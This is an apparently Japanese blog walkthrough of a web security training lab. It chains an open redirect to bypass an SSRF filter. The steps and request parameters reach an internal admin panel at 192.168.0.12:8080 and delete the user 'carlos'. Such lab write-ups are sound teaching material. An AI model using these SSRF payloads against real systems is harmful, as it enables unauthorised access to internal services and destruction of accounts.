Hello there, ('ω')ノ

 

オープンリダイレクトの脆弱性によるフィルタバイパスを備えたSSRFを。

まずは、Check stackしてからNext productして。

 

 

Check stockのリクエストをリピータへ。

 

 

下記に変更して実行してみるとエラーが。

　stockApi=http://192.168.0.12:8080

 

 

次にNext productのリクエストをリピータへ。

 

 

 

Next productのリクエストをCheck stockのリクエストのstockApiで実行すると。

エラーステータスが変わって。

　stockApi=/product/nextProduct?path=http://192.168.0.12:8080

 

 

adminを追加して実行すると管理者画面が。

　stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin

 

 

もとのページにもどって、再度Check stockを実行して。

 

 

さきほどのペイロードにstockApiを変更して管理者ページを。

 

 

carlosのDeleteパラメータを確認して。

 

 

下記のように再度、ペイロードを実行すると。

　stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

 

 

クリアできた。

 

 

Best regards, (^^ゞ